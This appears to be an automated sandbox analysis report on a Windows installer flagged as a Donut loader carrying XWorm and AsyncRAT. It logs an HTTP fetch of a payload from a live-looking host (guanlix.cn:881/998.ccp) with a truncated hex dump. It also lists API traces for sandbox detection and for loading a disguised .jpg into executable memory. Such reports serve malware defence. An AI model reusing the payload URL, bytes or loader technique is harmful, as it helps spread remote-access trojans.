Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	91.208.240.157	881	1564	C:\Users\user\Desktop\998_popxinv_Installer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 19:28:28.903692007 CEST	94	OUT	GET /998.ccp HTTP/1.1 User-Agent: Download Host: guanlix.cn:881 Cache-Control: no-cache
Jul 2, 2024 19:28:29.858350039 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Tue, 02 Jul 2024 17:28:12 GMT Content-Type: application/octet-stream Content-Length: 71938 Last-Modified: Mon, 01 Jul 2024 15:58:27 GMT Connection: keep-alive ETag: "6682d223-11902" Accept-Ranges: bytes Data Raw: e8 88 bb 00 00 88 bb 00 00 47 37 45 de e2 93 60 43 cd f2 b7 77 6f 01 1b 00 75 08 f2 3a 89 f9 f3 f0 7b f0 f4 2c d4 cc d8 24 00 00 00 00 22 bd 18 fe a3 43 ac 17 ee b6 3e 62 b0 ff 80 df 8e 31 4a e4 ca a9 b0 12 6a db 7e 32 35 ed 70 f8 00 db 16 83 58 12 b7 42 68 b7 52 5a 42 30 0a 12 47 61 75 e8 4e 53 68 ae d8 84 ed 34 72 0e 7f ad f8 0d 5b 01 fc 84 6c 7d 68 c8 71 4b 48 16 2e 08 c4 02 20 61 81 75 b6 04 8b 61 02 cd 54 2f 4c 32 62 1f cf dc 51 a3 87 a4 fe 53 f4 59 37 e4 9d d8 c7 5c 76 05 e8 ad 49 1f 28 73 dd ed 6e 2e 0c 48 2f 93 6c da 4c 61 bc 8c 34 74 f0 4f 0c a4 e8 50 23 6d d1 73 fc fc d2 56 58 1a 12 1a 69 5a e9 fe 1d cc 66 23 37 fc 39 01 1f 0d 71 e0 c9 31 40 76 3d 4d 14 a3 06 aa fa ab 14 ac 03 80 13 f5 7c 05 81 fa 10 80 bb 6b 89 73 e8 31 b9 5b b5 2e 0e 35 ac b7 56 10 05 15 cc 06 bf 29 ab 89 35 b0 05 25 0d c1 f4 65 5c ab e0 7c 07 b0 24 8c 12 5e ef 50 b2 92 07 f6 1f 74 7c 28 9a ba 29 e1 17 a5 cb 4b a2 57 6c 0f 3c d0 9e 42 2a 27 6e 46 6e f1 42 a1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: G7E`Cwou:{,$"C>b1Jj~25pXBhRZB0GauNSh4r[l}hqKH. auaT/L2bQSY7\vI(sn.H/lLa4tOP#msVXiZf#79q1@v=M\|ks1[.5V)5%e\\|$^Pt\|()KWl<B*'nFnB\|qg9XVJ6C}FWz~9=,.4-g'<udTF0 T?F/:+vl$tN?3~=0Hm_--}Of}r\|,0DP]~U'99=ap9L.Q>/1:&&Xj;BtLtBV?Q=^ll7%~YWw5VJN71=`Aa]%M=9}!{Y1kr-cmaoa#lw`B[@UYH:^[K5km

Target ID:	0
Start time:	13:28:27
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\998_popxinv_Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\998_popxinv_Installer.exe"
Imagebase:	0xa10000
File size:	249'344 bytes
MD5 hash:	A8DC1E962F313CD278B0E648A6674D91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	2.9%
Signature Coverage:	3.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	62

Executed Functions

Function 00A125C5 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A125C5

Part of subcall function 00A1221A: __EH_prolog.LIBCMT ref: 00A1221F

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 45c6798c7112b0a8e436fecd480e63c52e286909c9319b22cb2ca61e2c633d2f
Instruction ID: 3b468d168e6e5c73b49dc1bda8c0959c1e64b435e4968d5e1e1d3979cc440628
Opcode Fuzzy Hash: 45c6798c7112b0a8e436fecd480e63c52e286909c9319b22cb2ca61e2c633d2f
Instruction Fuzzy Hash: 03113AB5900258EFCF11DF98CA90AEEBBB4FF18314F10805AE512AB251C775DA50DFA1

Function 05FA4D08 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\VGm, xrefs: 05FA4FBF

Memory Dump Source

Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID: \VGm
API String ID: 0-1150679331
Opcode ID: 3d1db5c79f1da02858b24350ba446df9bc89479b863f239731be26988d429976
Instruction ID: 930a875dea04643f36858900390fecdad0bd41a98df23b182cbece935ee85415
Opcode Fuzzy Hash: 3d1db5c79f1da02858b24350ba446df9bc89479b863f239731be26988d429976
Instruction Fuzzy Hash: 8AB150B2E00209CFDF14CFA9D885BDDBBF2BF88314F148129D415AB254EB799845CB92

Function 05FA55D8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86212b7564f96911dba6223ca0e0f5b20f3a5b05ebca4909e049bac57e0fb3c5
Instruction ID: 3ec28c19902e8aa12fb226671893a7661e9a1f8aa1d15a1b02658865a82333d2
Opcode Fuzzy Hash: 86212b7564f96911dba6223ca0e0f5b20f3a5b05ebca4909e049bac57e0fb3c5
Instruction Fuzzy Hash: EEB151B2E04209DFDF14CFA9C88579DBBF2BF88314F148529D815EB254EB799845CB82

Function 00A111E1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00A111EF
Sleep.KERNEL32(0000012C), ref: 00A111F9
GetTickCount64.KERNEL32 ref: 00A111FF

Part of subcall function 00A14424: __vwprintf_l.LIBCMT ref: 00A14432

CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00A11244
GetFileSize.KERNEL32(00000000,00000000), ref: 00A1124E
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00A1125F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A11270
CloseHandle.KERNEL32(00000000), ref: 00A11277

Strings

C:\Users\Public\Downloads\ind.jpg, xrefs: 00A1123F
v4:%d, xrefs: 00A1120C
sandbox!!!, xrefs: 00A11222
`3Wu01Wu, xrefs: 00A1124E

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
String ID: C:\Users\Public\Downloads\ind.jpg$`3Wu01Wu$sandbox!!!$v4:%d
API String ID: 1694741105-1659962086
Opcode ID: 07fa94122a7c17fef0f4890fbccfd87ece8dcafe3acc794ad39291749788f331
Instruction ID: a0b994b4b60c0d6e871574878d7a71ef4049174eb2bbeb088f5430df9331ad4a
Opcode Fuzzy Hash: 07fa94122a7c17fef0f4890fbccfd87ece8dcafe3acc794ad39291749788f331
Instruction Fuzzy Hash: 281184736442187FE73097FD6C49FBB7A6CEB46B70F100535FA09E2190E6A45C0282B1

Function 00A12E5A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00A12E5A
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00A12E76
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00A12E93
InternetCloseHandle.WININET(?), ref: 00A12F27

Part of subcall function 00A12D2B: __EH_prolog.LIBCMT ref: 00A12D30

InternetReadFile.WININET(?,?,00001000,?), ref: 00A12EF9
InternetCloseHandle.WININET(?), ref: 00A12F0F

Strings

Download, xrefs: 00A12E71

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: cb676fdca3d862859dcb0b682ecb8861b24eb10db7ecb93c89f1e04de0cb227f
Instruction ID: abd45cbf9a0dd6eec0bcdb136f7bb9a311c923317e41cbac18852e05b609ba51
Opcode Fuzzy Hash: cb676fdca3d862859dcb0b682ecb8861b24eb10db7ecb93c89f1e04de0cb227f
Instruction Fuzzy Hash: EC21077190011AEFEF21DB94CD85FEEBB7DFB04754F100169B605A6190D6709EA5CB60

Function 00A12E55 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00A12E5A
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00A12E76
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00A12E93
InternetCloseHandle.WININET(?), ref: 00A12F27

Part of subcall function 00A12D2B: __EH_prolog.LIBCMT ref: 00A12D30

InternetReadFile.WININET(?,?,00001000,?), ref: 00A12EF9
InternetCloseHandle.WININET(?), ref: 00A12F0F

Strings

Download, xrefs: 00A12E71

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: a2607fa8f089cb6489c696fc18d0be702f105d4e7c031df364b2ffe33e4cb66c
Instruction ID: 7c993609a9ec5151114918579afce9d86d38ed6818001b5566f169e8b7a4f361
Opcode Fuzzy Hash: a2607fa8f089cb6489c696fc18d0be702f105d4e7c031df364b2ffe33e4cb66c
Instruction Fuzzy Hash: 21113A71900219EFEB20DB98DD85FEEBB79EB08754F104179B601A6190D6709EA6CB60

Function 03ADFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,00000002,?,03ADFCB5,00000000), ref: 03ADFFF5
VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,03ADFCB5,00000000), ref: 03AE0035
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 03AE0068
VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 03AE0093
VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 03AE00BD

Memory Dump Source

Source File: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ad0000_998_popxinv_Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction ID: 06315c24d797558dbd2a564a21c407ac26f4a4656d52639e05c9e9033b198a68
Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction Fuzzy Hash: 632165B620530A6FD720DA65CD88E7BB7ECEB84302B05083FBA47D2551EBB5E5058661

Function 00A1297C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00A1297C
_Fputc.LIBCPMT ref: 00A129E1
_Fputc.LIBCPMT ref: 00A12AB7

Strings

, xrefs: 00A12A8E

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Fputc$H_prolog
String ID:
API String ID: 1896196775-3916222277
Opcode ID: 1e9a83093be4347680d4676884fe56f7dc2696a623a8158a5de45012a77fd3a4
Instruction ID: 3e49c7e54ed862efdb836e69f4cba2816150ec192fc4d97dbdfb175a49d9d299
Opcode Fuzzy Hash: 1e9a83093be4347680d4676884fe56f7dc2696a623a8158a5de45012a77fd3a4
Instruction Fuzzy Hash: D4416E31A01609DFCF25CB98CA80AEEB7F5FF58750F24091AE542A7280E771ED94CB60

Function 03AE00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 03AE011B
VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 03AE014E
VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 03AE0179
VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 03AE01A3

Memory Dump Source

Source File: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ad0000_998_popxinv_Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction ID: 0c2b1754bd67c8ab34556bb100d248fec06573af23923cd7cb7bb308dc4edf78
Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction Fuzzy Hash: 0B2195B63047496FE320DA62CD88E7BB7FCEB88241B04083EBA87D5541EBB4F5058670

Function 00A12F3A Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A11186: __time64.LIBCMT ref: 00A1118E
Part of subcall function 00A11186: _rand.LIBCMT ref: 00A1119E
Part of subcall function 00A11186: _rand.LIBCMT ref: 00A111AD

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00A12F4B

Part of subcall function 00A12E55: __EH_prolog.LIBCMT ref: 00A12E5A
Part of subcall function 00A12E55: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00A12E76
Part of subcall function 00A12E55: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00A12E93
Part of subcall function 00A12E55: InternetReadFile.WININET(?,?,00001000,?), ref: 00A12EF9
Part of subcall function 00A12E55: InternetCloseHandle.WININET(?), ref: 00A12F0F
Part of subcall function 00A12E55: InternetCloseHandle.WININET(?), ref: 00A12F27

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A12F6C

Part of subcall function 00A1168B: _wprintf.LIBCMT ref: 00A1169D
Part of subcall function 00A1168B: _wprintf.LIBCMT ref: 00A116B5
Part of subcall function 00A1168B: _wprintf.LIBCMT ref: 00A116CA
Part of subcall function 00A1168B: _wprintf.LIBCMT ref: 00A116E2

Part of subcall function 00A111E1: GetTickCount64.KERNEL32 ref: 00A111EF
Part of subcall function 00A111E1: Sleep.KERNEL32(0000012C), ref: 00A111F9
Part of subcall function 00A111E1: GetTickCount64.KERNEL32 ref: 00A111FF
Part of subcall function 00A111E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00A11244
Part of subcall function 00A111E1: GetFileSize.KERNEL32(00000000,00000000), ref: 00A1124E
Part of subcall function 00A111E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00A1125F
Part of subcall function 00A111E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A11270
Part of subcall function 00A111E1: CloseHandle.KERNEL32(00000000), ref: 00A11277

Strings

C:\Users\Public\Downloads\ind.jpg, xrefs: 00A12F51
http://guanlix.cn:881/998.ccp, xrefs: 00A12F56

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Internet$File_wprintf$CloseHandleVirtual$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
String ID: C:\Users\Public\Downloads\ind.jpg$http://guanlix.cn:881/998.ccp
API String ID: 2148924518-3025796919
Opcode ID: d52e6ce53dcd2df1b0720732b23accedfd1c59f0c7c1667eb3d807a0e9787539
Instruction ID: 668f5b466e962767dc6360084ca7b633d2e92a14e204eb2b74a08892b6fb27b4
Opcode Fuzzy Hash: d52e6ce53dcd2df1b0720732b23accedfd1c59f0c7c1667eb3d807a0e9787539
Instruction Fuzzy Hash: 3DE017722883207AF661B3F87D0BFEB1518EB00F51F214925F745A90C2DA9569839669

Function 03ADFB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 03ADFB8F
LoadLibraryA.KERNEL32(00000238), ref: 03ADFC2C

Memory Dump Source

Source File: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ad0000_998_popxinv_Installer.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction ID: 1f24726b12afef2d4eb0f92278b074cf05180a5fb564b59bed09325fb2e3914c
Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction Fuzzy Hash: 9261D276501B02AFCB31EBA4CD84A9BB3E9FF05218F180A1FEA9B49540E735F161CB51

Function 00A15902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A1A95F: __getptd_noexit.LIBCMT ref: 00A1A95F

__lock_file.LIBCMT ref: 00A15949

Part of subcall function 00A150E4: __lock.LIBCMT ref: 00A15109

__fclose_nolock.LIBCMT ref: 00A15954

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 98e8c93f8f31c3312728681225f2737f6dbb6a16984a9406ca9d0257d221b14b
Instruction ID: 64026bae24a9b7810eba3611e0f2ae874d6d182d1ba49134e187224f3fd0809a
Opcode Fuzzy Hash: 98e8c93f8f31c3312728681225f2737f6dbb6a16984a9406ca9d0257d221b14b
Instruction Fuzzy Hash: 72F09031C01B15DADB10ABB48A02BDE7BA06F81335F258649A475AA1C2C7785AC19A96

Function 05FA75E0 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8089a8a822e534191556605bd13b24c7ae48c09cab3c56735fa2ba35a32cb00a
Instruction ID: f83ff40aeb77e8a3330921635b5e56a9e33ddc4c686840de7da9aa7e609043a1
Opcode Fuzzy Hash: 8089a8a822e534191556605bd13b24c7ae48c09cab3c56735fa2ba35a32cb00a
Instruction Fuzzy Hash: A0412072E043498FCB14DFB9D8047AEBBF5EF89210F14866AD449A7340DB789881CBD1

Function 00A11848 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memmove.LIBCMT ref: 00A118A5

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8350eb834088de25137d2a4917a541500a83b05048782ec135a262c8e125f95f
Instruction ID: 299e43acffd8afad5d817014149235c422be0115e26b9527e9e85dba4d774f63
Opcode Fuzzy Hash: 8350eb834088de25137d2a4917a541500a83b05048782ec135a262c8e125f95f
Instruction Fuzzy Hash: D4311635900619EFCB14CF59C8846D9B7B5FF09365F24C26AEA24872A1E370DE90CF81

Function 00A12D2B Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A12D30

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 51e7d1ef76a4a06e88552693cf5fcb15f8444809c103173d56bf7df7687abf61
Instruction ID: 22d65e94d43de6b716cb2bdecad9a40572e0a3bc7b2556d5fab943707f2bb657
Opcode Fuzzy Hash: 51e7d1ef76a4a06e88552693cf5fcb15f8444809c103173d56bf7df7687abf61
Instruction Fuzzy Hash: D8112BB1A10215AFDB10DF98D981AABF7E9EF44744F04882EF4469B241C7B1DD51CB60

Function 00A12D30 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A12D30

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e976f15df3dd7a838e372f21fbe6921f382e87f69489cf59789b36b5bbc326d8
Instruction ID: de6bc1e529b3b6a436e4433f93e22222f63041e025d667d3fdae863687d477d4
Opcode Fuzzy Hash: e976f15df3dd7a838e372f21fbe6921f382e87f69489cf59789b36b5bbc326d8
Instruction Fuzzy Hash: 84112BB1A10215AFDB10DF98D981AABF7E9EB44744F04882EE44697241C7B1DD51CB60

Function 05FA76B0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05FA7632), ref: 05FA771F

Memory Dump Source

Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 950be8d6a64e499fdb0aa23db1a30c43fb21b4eec3c67426dbb6669823a0a6f2
Instruction ID: c5fa5739ec1159e9adbc0ce83337abf2e5d4d6fff7d9332cec724f43ac9147d6
Opcode Fuzzy Hash: 950be8d6a64e499fdb0aa23db1a30c43fb21b4eec3c67426dbb6669823a0a6f2
Instruction Fuzzy Hash: F51117B2C006599BDB10CFAAC445BDEFBF4EF48214F15812AE818A7640D378A941CFE5

Function 05FA6F64 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05FA7632), ref: 05FA771F

Memory Dump Source

